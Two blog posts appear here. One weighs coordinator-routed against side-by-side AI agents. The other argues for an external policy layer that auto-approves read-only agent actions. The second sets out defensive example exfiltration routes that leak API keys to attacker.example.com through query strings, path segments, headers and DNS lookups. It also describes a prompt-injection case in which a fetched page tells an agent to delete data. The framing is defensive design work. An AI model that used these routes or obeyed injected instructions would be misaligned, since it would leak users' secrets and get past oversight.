The division of labor in AI systems

Virgil｜文剛 — Sun, 26 Apr 2026 00:00:00 +0000

When building AI systems that handle multiple kinds of tasks, do you let different agents exist side by side — each owning its own domain — or do you funnel everything through a single entrypoint that routes to the right agent? At work, this design question has come up multiple times already.

Some of my colleagues and I presented our first agent POCs to the team last week. That question is now more urgent.

I’m increasingly convinced a single entrypoint routing to specialists is the better starting point, because the pattern itself is intuitive: a coordinator handles synthesis and judgment; each task goes to a specialist that is sufficient for the job and cheaper than the coordinator. In a well-run office team, the coordinator handles the routing so specialists can focus. AI agents have different constraints, but the structural logic is the same: routing and deep domain work are different reasoning modes, and mixing them in a single agent has a cost.

The coordinator sits at the top, receives any request, and routes it to the right specialist before synthesising the response.

The alternative

If each agent owns a clear domain — code, research, documentation — you pick the right one and off you go. The routing is done by the user, not the system. But what if the user has a request like “summarise the Q2 report and flag anything that looks wrong”? This is a retrieval task and a reasoning task at the same time. A side-by-side system would require you to split it upfront. The coordinator system handles the split for you.

What the coordinator enables

When the coordinator is responsible for understanding the request, the system can handle tasks that don’t fit neatly into one domain. Specialisation works on two levels. Domain — the problem space the specialist operates in, like code review or document retrieval. And thinking level — how deeply the specialist needs to reason. These aren’t the same thing. A simple script review and a complex distributed systems codebase are both code review, but they don’t call for the same reasoning depth. The coordinator doesn’t just pick the right domain specialist; it also has to estimate how much thinking the task requires.

What the research says

Google Research, Google DeepMind, and MIT published a large study on this in late 2025. In Towards a Science of Scaling Agent Systems, they tested five architectures across four benchmarks and measured error amplification — how much a mistake in one agent’s output cascades through the rest of the system. Independent architectures (no inter-agent communication) amplified errors 17.2× over the single-agent baseline. Centralized coordination contained that to 4.4× through a validation bottleneck. Decentralized and Hybrid fell between them at 7.8× and 5.1× respectively.

The picture isn’t one-directional: performance ranged from +80.9% on decomposable financial reasoning to −70% on sequential planning, depending on task structure. The coordinator-specialists pattern I’m describing isn’t universally better, but it’s better for the kind of work I’m thinking about. Trying this in practice will tell me where the boundaries actually are.

Where this leaves me

In my own research I have found that frameworks like LangGraph and AutoGen model this topology explicitly — a coordinator routing to specialists, with data passed between them. Both are on my list to dig into.

The design question is still open, but I am leaning towards the coordinator-specialists pattern. I’ll find out more once I start building.

Agents ask too many questions

Virgil｜文剛 — Tue, 14 Apr 2026 00:00:00 +0000

If you’ve used any agent harness for development work - Claude Code, OpenCode, Devin, or one of the many others - you’ve run into this: you’re mid-task, the agent needs to search the web or read a file, and it stops to ask permission. This is disruptive to the flow.

The naive fix is to just trust the agent more - expand the allow list, enable auto mode, and move on. But that’s not a viable long-term solution. An agent that self-certifies its own intent is exploitable. If a model can decide that fetching a URL is “just reading,” it can be manipulated into deciding that almost anything is.

The Right Fix: Take the decision away from the agent entirely. A policy layer external to the agent must inspect each action against objective criteria—the model’s intent is never consulted.

Read-only is an objective property

An action is read-only if it observes without modifying. Not “read-only from the agent’s perspective” - objectively read-only. HTTP GET, file read, directory listing. These have a defined shape. A policy layer external to the agent can inspect each action against objective criteria - HTTP method, syscall type, file path - and make the call without asking the model what it thinks it’s doing.

State-changing actions still prompt. Everything else passes automatically.

The policy layer evaluates each action against objective criteria - the model’s intent is never consulted.

Two edge cases worth taking seriously

A GET request can exfiltrate data. If an agent is manipulated into appending a secret to a query string - https://example.com/?token=sk-ant-... - the request is technically read-only but it’s leaking something. The same applies to path segments: https://attacker.example.com/exfil/sk-ant-api03-abc123 is functionally identical, but some implementations only scan query parameters. And data can be stuffed into outbound request headers - Referer, User-Agent, a custom X-Data header - none of which show up in URL inspection at all. The policy layer needs to handle all of this: run gitleaks-style pattern matching on the full URL and outbound headers before granting automatic permission. If anything contains what looks like a secret or personal data, it gets flagged.

DNS-based exfiltration is subtler. The agent resolves sk-ant-api03-abc123.attacker.example.com. The GET never fires - but the DNS lookup already transmitted the secret to the attacker’s nameserver. This happens below the HTTP layer. URL pattern matching never sees it because there’s no URL yet. Mitigation: restrict DNS resolution to known domains, or run the same secret-pattern matching on hostnames before resolution.

Prompt injection doesn’t break this

The obvious objection: what if the agent fetches a page that contains malicious instructions? The policy layer permits the fetch - it’s a GET - but now those instructions tell the agent to delete all your data.

This isn’t a problem. That deletion is a new action, evaluated independently by the policy layer at the point of execution. It gets flagged as a write and stopped. The model read something bad, but reading bad content doesn’t bypass the enforcement layer.

Where things stand

Most agent harnesses are moving toward fewer interruptions. Allow lists, intent classifiers, “auto mode” flags - these are all variations on the same theme: the harness tries to determine what’s safe by reasoning about the agent’s intent.

The problem is that intent is opaque and manipulable. A classifier trained to identify “safe” actions can be nudged into misclassifying. A model asked “is this safe?” can be prompted into saying yes. And in practice, these systems are reportedly brittle - auto modes that don’t fire when they should, classifiers that trigger on actions they shouldn’t.

The missing piece is enforcement that’s external and objective. Not a model deciding what’s safe. Not a classifier trained on past behavior. A proxy or kernel filter that doesn’t care what the model thinks - it only cares what the action is.

This isn’t theoretical. The pattern works because read-only and write are fundamentally different categories of action, not a spectrum the model has to reason about. An HTTP GET, a file read, a directory listing - these can be authorized by policy without ever asking the agent. Everything else gets held.

For builders and power users

If you’re building an agent harness: this is the permission model you want. Inspect actions at the transport or syscall layer, classify by type, apply pattern matching on sensitive data. The agent sees no prompts for reads; it only stops for writes.

If you’re choosing a harness: look for one with an external policy layer, not one that delegates trust to the model. Fewer interruptions are nice, but they only matter if the enforcement is real.

How are you handling agent permissions today: are you leaning toward auto-approve or manual confirmation? And have you run into the edge cases around secret exfiltration via URL or headers? Let me know in the comments.

Forem: Virgil｜文剛